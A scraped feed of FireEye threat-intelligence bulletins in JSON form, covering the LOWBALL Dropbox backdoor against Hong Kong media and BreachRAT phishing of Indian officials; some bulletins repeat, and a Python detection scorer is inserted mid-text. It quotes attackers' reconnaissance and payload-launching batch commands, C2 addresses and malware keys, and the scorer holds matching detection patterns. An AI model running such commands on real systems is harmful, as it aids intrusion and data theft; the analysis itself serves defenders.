This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\n| MD5 | Filename |\n|---|---|\n| b9208a5b0504cb2283b1144fc455eaaa | \u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc |\n| ec19ed7cddf92984906325da59f75351 | \u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc |\n| 6495b384748188188d09e9d5a0c401a4 | (\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc |\n\nIn all three cases, the payload was the same:\n\n| MD5 | Filename |\n|---|---|\n| d76261ba3b624933a6ebb5dd73758db4 | time.exe |\n\nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request over HTTPS (TCP port 443) for the files:\n\n| MD5 | Filename |\n|---|---|\n| d76261ba3b624933a6ebb5dd73758db4 | WmiApCom |\n| 79b68cdd0044edd4fbf8067b22878644 | WmiApCom.bat |\n\nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. 
Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n    @echo off\n    dir c:\\ >> %temp%\\download\n    ipconfig /all >> %temp%\\download\n    net user >> %temp%\\download\n    net user /domain >> %temp%\\download\n    ver >> %temp%\\download\n    del %0\n\n    @echo off\n    dir \"c:\\Documents and Settings\" >> %temp%\\download\n    dir \"c:\\Program Files\\\" >> %temp%\\download\n    net start >> %temp%\\download\n    net localgroup administrator >> %temp%\\download\n    netstat -ano >> %temp%\\download\n\nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n    @echo off\n    ren \"%temp%\\upload\" audiodg.exe\n    start %temp%\\audiodg.exe\n    dir d:\\ >> %temp%\\download\n    systeminfo >> %temp%\\download\n    del %0\n\nWe have previously observed the admin@338 group use BUBBLEWRAP. 
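The taskings above are short enough to read by eye, but the same traits recur in each of them: a burst of host and domain reconnaissance, every result appended to a single staging file under %temp%, and a closing `del %0` that removes the script. The scorer below is an added example, not FireEye detection content; the sample scripts are reconstructed from the commands quoted above, while the indicator weights and the alert threshold are assumptions chosen for illustration.

```python
"""Score a batch script for LOWBALL-style tasking traits.

Added example; not FireEye's detection logic. It checks for the three
traits the quoted taskings share: anchored reconnaissance commands,
output appended to a staging file under %temp%, and a self-deleting
`del %0`. Weights and the alert threshold are assumptions.
"""
import re

# Reconnaissance commands taken from the quoted taskings (anchored at line start).
RECON = [re.compile(p, re.I) for p in (
    r"^dir\b", r"^ipconfig\b", r"^net\s+user\b", r"^net\s+start\b",
    r"^net\s+localgroup\b", r"^netstat\b", r"^ver\b", r"^systeminfo\b",
)]
STAGING = re.compile(r">>?\s*\"?%temp%\\", re.I)      # output funneled under %temp%
SELF_DELETE = re.compile(r"^del\s+%0\s*$", re.I)       # script removes itself
STAGE_EXEC = re.compile(r"^(ren|rename|start)\s+\"?%temp%\\", re.I)  # run a dropped file


def _commands(text):
    """Yield trimmed command lines, skipping blanks, echo toggles and comments."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.lower().startswith(("@echo", "echo ", "rem ", "::")):
            continue
        yield line


def score_batch_tasking(text):
    """Return the matched indicators, an additive score and a verdict."""
    recon, staged, self_delete, stage_exec = [], 0, False, False
    for line in _commands(text):
        if any(r.match(line) for r in RECON):
            recon.append(line.split(">", 1)[0].strip())  # command without its redirect
        if STAGING.search(line):
            staged += 1
        if SELF_DELETE.match(line):
            self_delete = True
        if STAGE_EXEC.match(line):
            stage_exec = True
    score = min(len(recon), 5)          # breadth of reconnaissance, capped
    score += 2 if staged >= 2 else 0    # results collected into one staging file
    score += 2 if self_delete else 0
    score += 2 if stage_exec else 0
    return {
        "recon": recon, "staged_lines": staged, "self_delete": self_delete,
        "stage_exec": stage_exec, "score": score, "suspicious": score >= 6,
    }


# Reconstructed from the taskings quoted in the article; not captured files.
LOWBALL_RECON = r"""@echo off
dir c:\ >> %temp%\download
ipconfig /all >> %temp%\download
net user >> %temp%\download
net user /domain >> %temp%\download
ver >> %temp%\download
del %0
"""

LOWBALL_STAGE = r"""@echo off
ren "%temp%\upload" audiodg.exe
start %temp%\audiodg.exe
dir d:\ >> %temp%\download
systeminfo >> %temp%\download
del %0
"""

# Constructed benign script for contrast.
BENIGN_BUILD = r"""@echo off
rem nightly build
cd /d %~dp0
msbuild app.sln /p:Configuration=Release > build.log
"""

if __name__ == "__main__":
    for name, script in (("recon", LOWBALL_RECON), ("stage", LOWBALL_STAGE), ("benign", BENIGN_BUILD)):
        r = score_batch_tasking(script)
        print(f"{name}: score={r['score']} suspicious={r['suspicious']} recon={r['recon']}")
```

The scorer is deliberately tolerant of reordering and of extra lines, since the two quoted taskings already differ in their command sets; what it keys on is the combination of breadth, a single staging sink and self-deletion, which a legitimate administrative script rarely shows together.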
This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\n| MD5 | CnC domain | IP address |\n|---|---|---|\n| 0beb957923df2c885d29a9c1743dd94b | accounts.serveftp.com | 59.188.0.197 |\n\nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. 
The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and which almost always uploads the results (download.rar) to the cloud storage account\n * silent.txt and period.txt, small files of 0 to 4 bytes that dictate how often the implant checks in with the CnC\n\nThe threat actor then downloads the results and deletes the files from the cloud storage account.\n\n### Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. 
HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. 
http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "edition": 2, "cvss3": {}, "published": "2015-12-01T08:00:00", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T08:00:00", "id": "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:17", "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. 
Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. 
Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. 
The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/Decryption Function**\n\n * (a) Generates an array of integers from 0x00 to 0xff\n * (b) Scrambles the state of the table using the given key\n * (c) Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with the name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Setting the Windows Startup Registry key with the name \u201cSystem Update\u201d to point to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. 
The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "edition": 2, "cvss3": {}, "published": "2016-06-03T01:30:00", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-06-03T01:30:00", "id": "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:06", "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. 
This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. 
Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. 
The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/Decryption Function**\n\n * (a) Generates an array of integers from 0x00 to 0xff\n * (b) Scrambles the state of the table using the given key\n * (c) Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with the name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Setting the Windows Startup Registry key with the name \u201cSystem Update\u201d to point to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. 
The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "edition": 2, "cvss3": {}, "published": "2016-06-03T01:30:00", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-06-03T01:30:00", "id": "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. 
A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well as some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. 
The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. 
This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\n| MD5 | Filename |\n|---|---|\n| b9208a5b0504cb2283b1144fc455eaaa | \u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc |\n| ec19ed7cddf92984906325da59f75351 | \u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc |\n| 6495b384748188188d09e9d5a0c401a4 | (\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc |\n\nIn all three cases, the payload was the same:\n\n| MD5 | Filename |\n|---|---|\n| d76261ba3b624933a6ebb5dd73758db4 | time.exe |\n\nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\n| MD5 | Filename |\n|---|---|\n| d76261ba3b624933a6ebb5dd73758db4 | WmiApCom |\n| 79b68cdd0044edd4fbf8067b22878644 | WmiApCom.bat |\n\nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. 
Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. 
This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\n| MD5 | CnC Domain | IP Address |\n|---|---|---|\n| 0beb957923df2c885d29a9c1743dd94b | accounts.serveftp.com | 59.188.0.197 |\n\nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify whether admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit, the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. 
